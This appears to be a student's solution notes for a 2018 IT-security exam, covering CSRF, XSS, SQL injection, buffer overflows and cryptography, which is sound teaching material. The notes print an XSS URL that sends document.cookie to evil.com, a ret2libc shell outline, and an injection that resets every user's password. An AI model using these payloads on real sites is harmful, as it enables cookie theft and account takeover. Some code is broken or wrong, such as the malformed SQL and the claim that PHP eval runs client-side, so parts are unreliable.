2018 Exam

Multiple Choice Part

Which of the following security mechanisms provide integrity?

Digital signature

Public Key Cryptography

Symmetrical Cryptography

Solution
Integrity means that the data is only changed when authorized / System behaves as expected.
Message integrity means changes to the message during transmission are noticable to the recipient.
- ✅ Mandatory Access Control MAC : is a type of access control - the subjects only have write access to files when authorized
- ✅ Message Authentication Code MAC : The signature / encryption algorithm that generates a tag $\text{Sig}(k, m) = t$ that only verifies the unmodified original message.
- ✅ Digital Signature : Same as above but there is a private and public key - therefore we have message integrity and authentication.
- ❌ Public-Key-Encryption : changes to message stay unnoticed
- ❌ Symmetric-Key-Encryption : changes to message stay unnoticed

Let a cookie have the property secure - which requests does it get attached to?

Solution
Only attached to HTTPS requests (confidentiality)
Can not be set or overwritten by HTTP requests (integrity)

When is a process secure under the assumption that for it uses a secure password $p$ a secure hashing function $h(p)$ and a public database for authentication? (assuming the communication is encrypted)

$h(p)$ gets transfered and $h(p)$ gets stored

$p$ gets transfered and $h(p)$ gets stored

$h(p)$ gets transfered and $p$ gets stored

$p$ gets transfered and $p$ gets stored

Solution
Assuming were using a cryptographic protocol:
- ✅ (still vulnerable to offline dictionary attacks)
- ❌This is under the assumption that a reflection attack would be possible by intercepting and resending this message to authenticate as an attacker
- ❌ because our database is public
- ❌ because our database is public

Which of the following are effective counter-measures against Cross-Site-Request-Forgery CSRF?

Anti-CSRF-Tokens in Forms

Referer Header validation

Custom HTTP-Headers

classic Cookie Authentification

Solution
Cross site request forgery CSRF
When the attacker triggers requests on the victims browser (that is authenticated on that website) through auto-submission of forms or sources of resources that get fetched automatically when visiting the attackers website.
- ✅ Anti-CSRF-Tokens in Forms contain a hidden value that gets sent with the request and gets validated by the request recipient
- ✅ Referer Header in all requests. Contains the origin of the request. Effective but often accidentally suppressed by the network, browser, $\dots$
- ✅ Custom HTTP-Headers = Cookie-to-header token is a cookie with a randomly generated token is set upon the first visit of the web application then read by clients browser and set as a custom header on further requests.
- ❌ classic Cookie Authentification is useless

Which attacks does a stack canary prevent that sits between local variables and the return address pointer?

Solution
If we do not consider all the possibilities to bypass the canary, then it prevents overwriting sfp , ret , and the current functions arguments funcp .

Which attacks does the DEP prevent?

Solution
the execution of code on the stack - and thereby prevents code injections. (But can be bypassed through ret2libc, ROP, attacks on memory mapping routine and heap possible, ...)

Which of the following are successful countermeasures against an SQL injection?

Detecting wheter <script> -Tags were used is enough

Whitelisting of allowed characters

Prepared Statements

Input validation (?)

Solution
- ❌ Script tags
- ✅ Whitelisting allowed characters
- ✅ prepared statements
- ✅ Broadly speaking - correct input validation would prevent it

A javascript script on the page a.com/index.html can do the following things: (Same Origin Policy)

Open the page a.com/irgendwas.html in another tab

Open the page a.com/irgendwas.html in another tab and edit the DOM

Open the page b.com/irgendwas.html in another tab

Open the page b.com/irgendwas.html in another tab and edit the DOM

Solution
(Not sure about opening another tab)
Javascript scripts can only read and write on same-origin-resources like the DOM.

One time pad OTP

What can an attacker learn in the following situations?

Messages $m_1$ and $m_2$ get encrypted with the same key $k$ . An attacker knows this. What can the attacker learn about the messages?
- Solution
  $c_1=\operatorname{Enc}\left(k,m_1\right)= k \oplus m_1$
  $c_2=\operatorname{Enc}\left(k,m_2\right)= k \oplus m_2$
  $c_{1} \oplus c_{2}=m_{1} \oplus {m}_{2}$
  which is vulnerable to frequency analysis.

Message $m$ gets encrypted with $k$ . The attacker knows the message and its cipher. What can he figure out about $k$ ?
- Solution
  $c= k \oplus m$
  $c \oplus k = m$
  Attacker knows $m$ and $c$ and can figure out the key based on that.

A message is 2 bits shorter than its key and therefore gets encrypted the following way: $c = \text{OTP}(01 \mid\mid m,k)$ where $01$ stands for the bitwise concatenation.
- Solution
  If we just add 2 bits to the message so that it matches the length of the key, we change nothing about the security.

Cross Site Scripting XSS

<html> Output: <?php echo $_GET["argument"]; ?></html>

Where does the vulnerability lie?
- Solution
  📎 In depth explaination
  There is no user validation, the server returns a HTML page with the php command added to echo .
  Remote code execution is not possible since we dont execute injected code on the server, but this code is vulnerable to reflected XSS attacks.

Generate a URL that reads the cookie and sends it to an evil site.
- Solution
  Get uses the arguments from query parametrs, we therefore just write a php script:
```
GET ?argument=a; eval("PHP SCRIPT HERE") # HTTP/2
Host: example.com
```
  That gets executed on the client side.
```
https://original.com/argument=<script>fetch('https://evil.com/',{method: 'POST', body: document.cookie});</script>
```

Why can this code access the cookies?
Because we are not validating the user input from the URL query.

Buffer Overflow

Given: C-code with a bufferflow vulnerability where we print things at different points with printf(...) .

Where does the vulnerability lie?
- Solution
  Programs that use functions from a shared library (like printf from libc), link entire library into their address space at run time.
  Therefore a Return-to-libc ret2libc attack is possible
  Allows bypassing DEP: No code injection.

Write an explout that uses the vulnerability to call a shell
- Solution
  1. overwriting ret → library instructions, like system(), exec(), ...
  1. Setting function arguments ( funcp behind ret ) to "/bin/sh"

Describe how each of these memory security measures could have prevented the attack: Canary, DEP, ASLR
- Solution
  - Canary could possibly have prevented overwriting the return pointer
  - DEP would have no effect
  - ASLR would have made it really difficult to guess the library instruction

SQL-Injection

Query that updates a users password:

$var_username = $_GET['username'];
$var_password = $_GET['password'];
$sql = "UPDATE users SET  = '" . $var_passwort . "' WHERE username = '"+var_username+"'";
mysql_query(sql);

Write an exploit that sets the passwords of all users to "hacked"
- Solution
```
username:  ' OR LIKE '%
password:  hacked
```

Which SQL query gets executed?

Solution

UPDATE users SET 'hacked' WHERE username = '' OR LIKE '%'

What are prepared statements and how do they prevent SQL injections?
- Solution
  allow to embed untrusted parameters in a query, while ensuring that their syntactical structure is preserved

What would this code look like with prepeared statements?

Solution

<?php
$db = new PDO(CONNECTION_STRING, DB_USER, DB_PASS);
$query = "UPDATE users SET  = ? WHERE username = ?";
$sth = $db->prepare($query);
$sth->bindValue(1, $_GET['password']);
$sth->bindValue(2, $_GET['username']);
$sth->execute();
$user = $sth->fetch();
// ...
?>